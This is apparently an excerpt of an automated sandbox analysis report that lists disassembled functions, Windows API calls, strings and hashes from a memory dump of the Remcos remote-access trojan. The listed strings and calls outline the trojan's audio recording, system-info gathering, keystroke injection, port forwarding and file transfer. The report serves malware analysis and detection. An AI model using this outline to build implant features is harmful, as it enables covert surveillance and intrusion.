                                                                                                • Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                • Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
                                                                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: 91115a630abed841a883f8823191e2b1499a4e339edc73cf2967208c6af6f964
                                                                                                • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                • Opcode Fuzzy Hash: 91115a630abed841a883f8823191e2b1499a4e339edc73cf2967208c6af6f964
                                                                                                • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                • int.LIBCPMT ref: 00410EBC
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                • String ID: <kG$@kG
                                                                                                • API String ID: 3815856325-1261746286
                                                                                                • Opcode ID: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                • Opcode Fuzzy Hash: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                • __freea.LIBCMT ref: 00454083
                                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 60ef2ba7967959a3bb5abb213fcabd91113b8325e5b7fdcf5ca33ed2e0ecdaf3
                                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                • Opcode Fuzzy Hash: 60ef2ba7967959a3bb5abb213fcabd91113b8325e5b7fdcf5ca33ed2e0ecdaf3
                                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                • _free.LIBCMT ref: 00445515
                                                                                                • _free.LIBCMT ref: 0044552E
                                                                                                • _free.LIBCMT ref: 00445560
                                                                                                • _free.LIBCMT ref: 00445569
                                                                                                • _free.LIBCMT ref: 00445575
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 6f1d39b58dd635c4ed11e96029a3cbcd4864377c401e683a9a2b4ff7d9f0077f
                                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                • Opcode Fuzzy Hash: 6f1d39b58dd635c4ed11e96029a3cbcd4864377c401e683a9a2b4ff7d9f0077f
                                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                Function 00411530 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                • API String ID: 3578746661-168337528
                                                                                                • Opcode ID: 2f385a75159af1027d885fa0c49e9949be3658d4e5c79a28fda3805584dfcd00
                                                                                                • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                                                                • Opcode Fuzzy Hash: 2f385a75159af1027d885fa0c49e9949be3658d4e5c79a28fda3805584dfcd00
                                                                                                • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474F08,00404C49,00000000,?,?,?,00474F08,?), ref: 00404BA5
                                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                • Opcode Fuzzy Hash: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                Function 00401B8F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401BD4
                                                                                                  • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                                                                • API String ID: 3809562944-3627046146
                                                                                                • Opcode ID: 92e028a72761fe09c9e15705bebed9d7aaee4e34048397f944afe691d3eaace1
                                                                                                • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                                                                • Opcode Fuzzy Hash: 92e028a72761fe09c9e15705bebed9d7aaee4e34048397f944afe691d3eaace1
                                                                                                • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                                                                Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendInput.USER32 ref: 00419A25
                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend$Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 1167301434-0
                                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                • String ID: a/p$am/pm$h{D
                                                                                                • API String ID: 2936374016-2303565833
                                                                                                • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                • _free.LIBCMT ref: 00444E87
                                                                                                • _free.LIBCMT ref: 00444E9E
                                                                                                • _free.LIBCMT ref: 00444EBD
                                                                                                • _free.LIBCMT ref: 00444ED8
                                                                                                • _free.LIBCMT ref: 00444EEF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: KED
                                                                                                • API String ID: 3033488037-2133951994
                                                                                                • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                                                • __fassign.LIBCMT ref: 0044B514
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                Function 0040186A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: `kG$hMG$kG
                                                                                                • API String ID: 1649129571-3851552405
                                                                                                • Opcode ID: a5ba242c8c709f1fd36122b2fcda02690f5f2dde985b3253a2c79e6b1374742b
                                                                                                • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                • Opcode Fuzzy Hash: a5ba242c8c709f1fd36122b2fcda02690f5f2dde985b3253a2c79e6b1374742b
                                                                                                • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 37874593-930133217
                                                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
